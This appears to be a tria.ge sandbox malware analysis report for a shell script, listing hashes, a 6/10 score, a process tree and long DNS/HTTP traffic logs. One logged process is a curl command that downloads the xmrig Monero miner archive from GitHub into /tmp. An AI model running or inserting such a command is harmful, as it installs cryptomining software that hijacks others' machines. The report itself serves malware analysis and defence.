Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

script.sh

ubuntu-18.04-amd64

6

script.sh

ubuntu-20.04-amd64

10

script.sh

ubuntu-22.04-amd64

10

script.sh

ubuntu-24.04-amd64

10

Analysis

  • max time kernel
    300s
  • max time network
    897s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    01/07/2024, 11:25 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    script.sh

  • Size

    8KB

  • MD5

    97423634cc1762b2f010cb860e7fb47d

  • SHA1

    2f50775e8fe9ab98a80f06d835c5874091bf0b3e

  • SHA256

    d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

  • SHA512

    bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f

  • SSDEEP

    192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Processes

  • /tmp/script.sh
    /tmp/script.sh
    1⤵
      PID:1497
      • /usr/bin/cut
        cut -f1 -d.
        2⤵
          PID:1500
        • /usr/bin/nproc
          nproc
          2⤵
            PID:1501
          • /usr/bin/bc
            bc -l
            2⤵
              PID:1504
            • /usr/bin/curl
              curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
              2⤵
                PID:1505

            Network

            • flag-us
              DNS
              raw.githubusercontent.com
              Remote address:
              1.1.1.1:53
              Request
              raw.githubusercontent.com
              IN A
              Response
              raw.githubusercontent.com
              IN A
              185.199.109.133
              raw.githubusercontent.com
              IN A
              185.199.111.133
              raw.githubusercontent.com
              IN A
              185.199.110.133
              raw.githubusercontent.com
              IN A
              185.199.108.133
            • flag-us
              DNS
              raw.githubusercontent.com
              Remote address:
              1.1.1.1:53
              Request
              raw.githubusercontent.com
              IN AAAA
              Response
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8003::154
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8000::154
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8002::154
              raw.githubusercontent.com
              IN AAAA
              2606:50c0:8001::154
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
              Response
              connectivity-check.ubuntu.com
              IN A
              185.125.190.96
              connectivity-check.ubuntu.com
              IN A
              185.125.190.48
              connectivity-check.ubuntu.com
              IN A
              91.189.91.96
              connectivity-check.ubuntu.com
              IN A
              185.125.190.18
              connectivity-check.ubuntu.com
              IN A
              91.189.91.48
              connectivity-check.ubuntu.com
              IN A
              91.189.91.98
              connectivity-check.ubuntu.com
              IN A
              185.125.190.49
              connectivity-check.ubuntu.com
              IN A
              185.125.190.17
              connectivity-check.ubuntu.com
              IN A
              185.125.190.98
              connectivity-check.ubuntu.com
              IN A
              185.125.190.97
              connectivity-check.ubuntu.com
              IN A
              91.189.91.49
              connectivity-check.ubuntu.com
              IN A
              91.189.91.97
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
              Response
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::98
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::197
              connectivity-check.ubuntu.com
              IN AAAA
              2001:67c:1562::24
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::96
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::198
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::23
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::2a
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::22
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::2b
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::196
              connectivity-check.ubuntu.com
              IN AAAA
              2001:67c:1562::23
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::97
            • flag-gb
              GET
              http://connectivity-check.ubuntu.com/
              Remote address:
              185.125.190.96:80
              Request
              GET / HTTP/1.1
              Host: connectivity-check.ubuntu.com
              Accept: */*
              Connection: close
              Response
              HTTP/1.1 204 No Content
              server: nginx/1.18.0 (Ubuntu)
              date: Mon, 01 Jul 2024 11:29:09 GMT
              x-cache-status: from content-cache/0
              x-networkmanager-status: online
              connection: close
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
              Response
              connectivity-check.ubuntu.com
              IN A
              91.189.91.98
              connectivity-check.ubuntu.com
              IN A
              185.125.190.97
              connectivity-check.ubuntu.com
              IN A
              185.125.190.49
              connectivity-check.ubuntu.com
              IN A
              91.189.91.96
              connectivity-check.ubuntu.com
              IN A
              185.125.190.18
              connectivity-check.ubuntu.com
              IN A
              185.125.190.96
              connectivity-check.ubuntu.com
              IN A
              185.125.190.48
              connectivity-check.ubuntu.com
              IN A
              91.189.91.49
              connectivity-check.ubuntu.com
              IN A
              91.189.91.97
              connectivity-check.ubuntu.com
              IN A
              91.189.91.48
              connectivity-check.ubuntu.com
              IN A
              185.125.190.17
              connectivity-check.ubuntu.com
              IN A
              185.125.190.98
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
              Response
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::2a
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::23
              connectivity-check.ubuntu.com
              IN AAAA
              2001:67c:1562::23
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::97
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::22
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::98
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::196
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::96
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::2b
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::198
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::197
              connectivity-check.ubuntu.com
              IN AAAA
              2001:67c:1562::24
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
            • flag-us
              GET
              http://connectivity-check.ubuntu.com/
              Remote address:
              91.189.91.98:80
              Request
              GET / HTTP/1.1
              Host: connectivity-check.ubuntu.com
              Accept: */*
              Connection: close
              Response
              HTTP/1.1 204 No Content
              server: nginx/1.18.0 (Ubuntu)
              date: Mon, 01 Jul 2024 11:34:09 GMT
              x-cache-status: from content-cache/2
              x-networkmanager-status: online
              connection: close
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN A
              Response
              connectivity-check.ubuntu.com
              IN A
              91.189.91.48
              connectivity-check.ubuntu.com
              IN A
              185.125.190.97
              connectivity-check.ubuntu.com
              IN A
              185.125.190.17
              connectivity-check.ubuntu.com
              IN A
              91.189.91.96
              connectivity-check.ubuntu.com
              IN A
              185.125.190.18
              connectivity-check.ubuntu.com
              IN A
              185.125.190.96
              connectivity-check.ubuntu.com
              IN A
              185.125.190.49
              connectivity-check.ubuntu.com
              IN A
              185.125.190.48
              connectivity-check.ubuntu.com
              IN A
              91.189.91.97
              connectivity-check.ubuntu.com
              IN A
              91.189.91.49
              connectivity-check.ubuntu.com
              IN A
              91.189.91.98
              connectivity-check.ubuntu.com
              IN A
              185.125.190.98
            • flag-us
              DNS
              connectivity-check.ubuntu.com
              Remote address:
              1.1.1.1:53
              Request
              connectivity-check.ubuntu.com
              IN AAAA
              Response
              connectivity-check.ubuntu.com
              IN AAAA
              2001:67c:1562::23
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::22
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::196
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::2a
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::198
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4002:1::197
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::98
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::23
              connectivity-check.ubuntu.com
              IN AAAA
              2001:67c:1562::24
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::2b
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::97
              connectivity-check.ubuntu.com
              IN AAAA
              2620:2d:4000:1::96
            • flag-us
              GET
              http://connectivity-check.ubuntu.com/
              Remote address:
              91.189.91.48:80
              Request
              GET / HTTP/1.1
              Host: connectivity-check.ubuntu.com
              Accept: */*
              Connection: close
              Response
              HTTP/1.1 204 No Content
              server: nginx/1.14.0 (Ubuntu)
              date: Mon, 01 Jul 2024 11:39:09 GMT
              x-cache-status: from content-cache-1ss/0
              x-networkmanager-status: online
              connection: close
            • 185.125.188.61:443
              tls
              135 B
               2
            • 185.125.188.61:443
              tls
              135 B
               2
            • 151.101.193.91:443
              tls, https
              466 B
               40 B
               2
              1
            • 151.101.193.91:443
              extensions.gnome.org
              tls
              6.1kB
               222.0kB
               108
              172
            • 195.181.164.14:443
              tls, https
              2.5kB
               11
            • 185.125.190.96:80
              http://connectivity-check.ubuntu.com/
              http
              355 B
               401 B
               5
              4

              HTTP Request

              GET http://connectivity-check.ubuntu.com/

              HTTP Response

              204
            • 91.189.91.98:80
              http://connectivity-check.ubuntu.com/
              http
              419 B
               389 B
               6
              4

              HTTP Request

              GET http://connectivity-check.ubuntu.com/

              HTTP Response

              204
            • 91.189.91.48:80
              http://connectivity-check.ubuntu.com/
              http
              407 B
               405 B
               6
              4

              HTTP Request

              GET http://connectivity-check.ubuntu.com/

              HTTP Response

              204
            • 1.1.1.1:53
              raw.githubusercontent.com
              dns
              82 B
               146 B
               1
              1

              DNS Request

              raw.githubusercontent.com

              DNS Response

              185.199.109.133
              185.199.111.133
              185.199.110.133
              185.199.108.133

            • 1.1.1.1:53
              raw.githubusercontent.com
              dns
              82 B
               194 B
               1
              1

              DNS Request

              raw.githubusercontent.com

              DNS Response

              2606:50c0:8003::154
              2606:50c0:8000::154
              2606:50c0:8002::154
              2606:50c0:8001::154

            • 224.0.0.251:5353
              292 B
               4
            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
               278 B
               1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

              185.125.190.96
              185.125.190.48
              91.189.91.96
              185.125.190.18
              91.189.91.48
              91.189.91.98
              185.125.190.49
              185.125.190.17
              185.125.190.98
              185.125.190.97
              91.189.91.49
              91.189.91.97

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
               422 B
               1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

              2620:2d:4000:1::98
              2620:2d:4002:1::197
              2001:67c:1562::24
              2620:2d:4000:1::96
              2620:2d:4002:1::198
              2620:2d:4000:1::23
              2620:2d:4000:1::2a
              2620:2d:4000:1::22
              2620:2d:4000:1::2b
              2620:2d:4002:1::196
              2001:67c:1562::23
              2620:2d:4000:1::97

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              172 B
               278 B
               2
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

              91.189.91.98
              185.125.190.97
              185.125.190.49
              91.189.91.96
              185.125.190.18
              185.125.190.96
              185.125.190.48
              91.189.91.49
              91.189.91.97
              91.189.91.48
              185.125.190.17
              185.125.190.98

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              172 B
               422 B
               2
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

              2620:2d:4000:1::2a
              2620:2d:4000:1::23
              2001:67c:1562::23
              2620:2d:4000:1::97
              2620:2d:4000:1::22
              2620:2d:4000:1::98
              2620:2d:4002:1::196
              2620:2d:4000:1::96
              2620:2d:4000:1::2b
              2620:2d:4002:1::198
              2620:2d:4002:1::197
              2001:67c:1562::24

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
               278 B
               1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

              91.189.91.48
              185.125.190.97
              185.125.190.17
              91.189.91.96
              185.125.190.18
              185.125.190.96
              185.125.190.49
              185.125.190.48
              91.189.91.97
              91.189.91.49
              91.189.91.98
              185.125.190.98

            • 1.1.1.1:53
              connectivity-check.ubuntu.com
              dns
              86 B
               422 B
               1
              1

              DNS Request

              connectivity-check.ubuntu.com

              DNS Response

              2001:67c:1562::23
              2620:2d:4000:1::22
              2620:2d:4002:1::196
              2620:2d:4000:1::2a
              2620:2d:4002:1::198
              2620:2d:4002:1::197
              2620:2d:4000:1::98
              2620:2d:4000:1::23
              2001:67c:1562::24
              2620:2d:4000:1::2b
              2620:2d:4000:1::97
              2620:2d:4000:1::96

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.